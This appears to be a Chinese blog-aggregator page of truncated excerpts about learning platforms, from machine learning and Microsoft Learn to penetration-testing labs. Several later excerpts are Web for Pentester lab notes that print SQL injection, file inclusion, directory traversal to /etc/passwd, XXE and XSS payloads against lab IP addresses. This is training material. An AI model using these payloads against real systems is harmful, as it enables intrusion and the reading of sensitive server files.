有人问我要渗透测试平台学习,我想到了Samurai ,记得里面带有很多的,这里来推广一下. Samurai Web 测试框架很多人说是live CD测试环境,但是现在似乎不是了,至少目前最新版的只有这么一个文件.下载了最新的SamuraiWTF3.3.2.vmwarevm.zip后,发现不是livecd,就是一个vmware.里面带的用于渗透测试的工具其实不是很多,比起kali什么的差的远了,但是里面带有很多渗透测试平台的确不错.如下图.     可惜下载启动后,发现这些渗透测试平台只能本地访问…

一个很好的MySQL在线学习平台 https://www.techonthenet.com/sql/…

下图为四种不同算法应用在不同大小数据量时的表现,可以看出,随着数据量的增大,算法的表现趋于接近.即不管多么糟糕的算法,数据量非常大的时候,算法表现也可以很好. 数据量很大时,学习算法表现比较好的原理: 使用比较大的训练集(意味着不可能过拟合),此时方差会比较低:此时,如果在逻辑回归或者线性回归模型中加入很多参数以及层数的话,则偏差会很低.综合起来,这会是一个很好的高性能的学习算法.…

1. 什么是Microsoft Learn Microsoft Learn是微软这两年大力推广的全新学习平台,可提供 Microsoft 产品交互式学习体验.基本上无需登录即可使用,但登录后可以使用更多功能,包括: 累积分数和成就 跟踪学习活动进度 使用免费的 Azure 资源 配置文件和仪表板功能 2. 选择课程 Microsoft Learn的网站首页会提供"你可能喜欢的内容",也可以浏览所有学习选项找到自己想学习的内容.学习内容有两种类型,分别是学习路径和模块: 学习路径是围绕特…

web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pentester_II 安装流程: 1.新建一个空白的虚拟机 2.选择web_for_pentester.iso,然后点击开始运行虚拟机即可. 3.网络设置,一般设置NAT自动获取ip即可,用ifconf…

Ignite 2018 首日感受 头一次参加美国的微软 Ignite 大会,确实规模比国内的大不少.23日是 MVP & RD 的 Pre Day(MVP即Most Valuable Professional,微软最有价值专家,RD即Regional Director,区域总监),24号是正式第一天.据说来了三万多人,太壮观了.因为我去晚了,没抢到好位置,现场是这样的: 外面还有很多人只能看直播了.虽然看见了微软CEO萨提亚,但离的很远,其实还不如看外场的大屏幕直播.接下来是各分会场的Sessi…

(转载:http://www.36dsj.com/archives/85383)机器学习与人工智能,相信大家已经耳熟能详,随着大规模标记数据的积累.神经网络算法的成熟以及高性能通用GPU的推广,深度学习逐渐成为计算机专家以及大数据科学家的研究重点.近年来,无论是图像的分类.识别和检测,还是语音生成.自然语言处理,甚至是AI下围棋或者打游戏都基于深度学习有了很大的突破.而随着TensorFlow.Caffe等开源框架的发展,深度学习的门槛变得越来越低,甚至初中生都可以轻易实现一个图像分类或者自动驾…

( 转载至: http://www.36dsj.com/archives/98977)  随着人工神经网络算法的成熟.GPU计算能力的提升,深度学习在众多领域都取得了重大突破.本文介绍了微博引入深度学习和搭建深度学习平台的经验,特别是机器学习工作流.控制中心.深度学习模型训练集群.模型在线预测服务等核心部分的设计.架构经验.微博深度学习平台极大地提升了深度学习开发效率和业务迭代速度,提高了深度学习模型效果和业务效果. 人工智能和深度学习 人工智能为机器赋予人的智能.随着计算机计算能力越来越强,在…

渗透测试平台Vulnreport介绍与使用   在这篇文章中,我们将跟大家讨论一些关于渗透测试方面的内容,并给大家介绍一款名叫Vulnreport的新型开源工具,而这款工具将能够让任何场景下的渗透测试任务变得更加简单. Vulnreport是什么? Vulnreport是一款渗透测试管理与自动化平台,它可以帮助我们完成很多枯燥乏味的安全渗透测试任务.虽然它无法代替渗透测试人员的位置,但是它可以增强测试人员的能力,使他们的工作更有效率.简而言之,它可以帮我们把所有的“脏活累活”全部做完,而研究人员…

本文适合有 Java 基础的人群 作者:DJL-Lanking HelloGitHub 推出的<讲解开源项目>系列.有幸邀请到了亚马逊 + Apache 的工程师:Lanking( https://github.com/lanking520 ),为我们讲解 DJL -- 完全由 Java 构建的深度学习平台. 介绍 许多年以来,一直都没有为 Java 量身定制的深度学习开发平台.用户必须要进行繁杂的项目配置,构建 class 才能最终打造出属于 Java 的深度学习应用.在那之后,依旧要面临着…

腾讯 Angel PowerFL 联邦学习平台 联邦学习作为新一代人工智能基础技术,通过解决数据隐私与数据孤岛问题,重塑金融.医疗.城市安防等领域. 腾讯 Angel PowerFL 联邦学习平台构建在 Angel 机器学习平台上,利用 Angel-­PS 支持万亿级模型训练的能力,将很多在 Worker 上的计算提升到 PS(参数服务器) 端:Angel PowerFL 为联邦学习算法提供了计算.加密.存储.状态同步等基本操作接口,通过流程调度模块协调参与方任务执行状态,而通信模块完成了任务训…

矩池云是一个专业的国内深度学习云平台,拥有着良好的深度学习云端训练体验.在性价比上,我们以 2080Ti 单卡为例,36 小时折扣后的价格才 55 元,每小时单价仅 1.52 元,属于全网最低价.用户体验上,平台为用户提供了公开数据集.案例.预装环境.高速网盘等配套设施和数据,让用户可以专注于深度学习研究. 高性价比 矩池云拥有很高的性价比,其的计费方式主要分为按时租与按周/月租.按时租用采用的是分钟级的实时计费模式,满足了用完即走的短时需要:按周/月租会以一个优惠的价格出租,可以满足长期租用的…

自适应学习技术自2015年以内,越来越受到在线教育公司的关注和重视,极客学院创始人靳岩7月初在接受媒体采访时曾提到,百万用户只是极客学院的第一步,下一步的目标是自适应学习.靳岩认为,自适应学习代表未来,而且相对其他门类,在线IT培训的内容逻辑性较强,是比较容易利用数据实现自适应学习的学科. 而就在极客学院准备着要切入自适应领域时,一家IT在线教育创业公司——大讲台科技,抢先宣布将倾力打造“IT在线教育自适应学习平台”,开启了IT在线教育“自适应”的大门.据悉,大讲台公司成立于今年2月,5月获得数…

NetHunter是一个基于Kali Linux为Nexus设备构建的Android渗透测试平台,其中包括一些特殊和独特的功能.NetHunter支持无线802.11注入,一键MANA AP搭建,HID键盘(类Teensy攻击)以及BadUSB MITM攻击测试.你只需拥有一台Nexus 5, Nexus 6, Nexus 7, Nexus 9, Nexus 10或OnePlus即可玩耍. 功能特性 .11无线注入和AP模式支持,支持多种USB无线网卡 能够进行USB HID键盘攻击测试 支持B…

openAI 公司给出了一个集成较多环境的强化学习平台  gym , 本篇博客主要是讲它怎么安装. openAI公司的主页: https://www.openai.com/systems/ 从主页上我们可以看到openAI 公司其实给出了多个强化学习的平台,不过最主要的就是  Gym 和  Baselines , 这里我们讲解如何安装gym . gym平台集成的环境种类较多,如较有名的Atria2600  , Baselines平台则集成了一些最新的强化学习算法, 有兴趣研究具体算法的人或许会对…

作者:向生李链接:https://www.zhihu.com/question/21914899/answer/39344435来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. Web安全工程师 Web安全相关概念熟悉基本概念(SQL注入.上传.XSS.CSRF.一句话木马等). 通过关键字(SQL注入.上传.XSS.CSRF.一句话木马等)进行Google/SecWiki: 阅读<精通脚本黑客>,虽然很旧也有错误,但是入门还是可以的: 看一些渗透笔记/视频,了解…

本章写给新加入我们破晓工作室的学弟学妹. 我现在写的是渗透方向的学习方向.因为我参加了线上培训班,听了专门培训渗透的课程后.所以感觉我们工作室自学太累了.如果没有一个“正确”的学习方向都不知道该学些什么. 我因为只学了三周不到,只能写下目前我理解的学习方向. 在学习渗透之前我们需要有一定的基础功,比如一定的网络基础,php python的编程基础和一定的英语水平.如果想深入学习的话这些缺一不可了.(对于对口的来说会更容易上手) web是一个很大很大的体系,我们在渗透之前要先“了解对方”,然后在尝…

前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 1.下载 地址https://www.vulnhub.com/entry/dc-1-1,292/ 建议用镜像,快一点 使用Oracle VM VirtualBox打开 2.开始 打开虚拟机后.提示需要账号密码 这个是需要你自己去找的 于是打开kali,vmware的网络配置使用桥接网络,用 arp…

一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[SOCKS4.SOCKS5和HTTP代理]] [[Windows - Netch 使用教程]] [[Netch设置端口ip进行转发流量]] [[全能终端神器--MobaXterm]] 通信协议 [[IIOP-百度百科]] 互联网内部对象请求代理协议 二.信息收集 02.信息收集 1.[[信息收集-汇总…

AngularJS 是非常棒的JS框架,能够创建功能强大,动态功能的Web app.AngularJS自2009发布以来,已经广泛应用于Web 开发中.但是对想要学习Angular JS 的人而言,只有官方文档,那是万万不够的.大多数人更愿意看一些入门视频,或者是更易于理解学习的Demo程序.因此本文推荐了10个AngularJS学习指南,助你一臂之力.   1. Year of Moo 超级赞的AngularJS学习指南,是由Year of Moo 创建的,包含AngularJS基本知识以及A…

这些都是学习Jquery很不错的资料,整理了一下,分享给大家. 希望能对大家的学习有帮助. 帕兰 Noupe带来的51个最佳jQuery教程和实例, 向大家介绍了jQuery的一些基本概念和使用的相关教程,  如果你对jQuery感兴趣, 也可以查看帕兰写的文章: 37个更加出色的jQuery插件 45个新鲜出炉的jQuery插件 50多个强大的jQuery插件应用实例 John Resig John Resig, 这位是 JQuery JavaScript脚本库的创建者, 同时也是Mozill…

Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23 http://192.168.91.139/sqli/example1.php?name=root' and 1=2%23 http://192.168.91.139/sqli/example1.php?name=root' uni…

Example 1 输入单引号,报错,得到物理路径 可通过../../../../etc/paaswd 读取敏感信息 可包含本地文件或远程文件 https://assets.pentesterlab.com/test_include.txt Example 2 加单引号,报错,可发现获取到的参数后面会加上.php后缀 通过%00截断后面字符 http://192.168.106.154/fileincl/example2.php?page=https://assets.pentesterlab.…

Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passwd 代码会检测是否包含/var/www/files/字符串 Example 3 http://192.168.…

example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Caa%3E%26name%3B%3C%2faa%3E http…

Example 1 http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script> Example 2 http://192.168.91.139/xss/example2.php?name=hacker<ScriPt>alert('xss')</ScriPt> Example 3 http://192.168.91.139/xss/example3.php?na…

https://blog.insanecoder.top/tcp-packet-splice-and-split-issue/ http://blog.csdn.net/qilixiang012/article/category/2857493             这是李林锋大神的博客,有9年NIO开发经验,精通Netty.…

目录 文章 一开始 HOWTO文档 网站/博客 高级 视频 组件 演示 UI 材料设计 图片 地图 图表 导航 验证 文字和富文本 分析.流量统计 自动构建 风格样式 媒体 音频 视频 语音 存储 获利 模板 插件 服务 扫码器 蓝牙 / NFC / 信号灯 框架 Redux / ELM / 依赖注入 动画 游戏引擎 其他 开源App 游戏 基础设施 社区 好玩的 福利 文章 一开始 Google IO 2018 [1K…

实际操作 http://www.cnblogs.com/xia520pi/archive/2012/05/16/2504205.html 流程解析 http://www.cnblogs.com/spork/archive/2010/04/11/1709380.html…

example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Caa%3E%26name%3B%3C%2faa%3E http…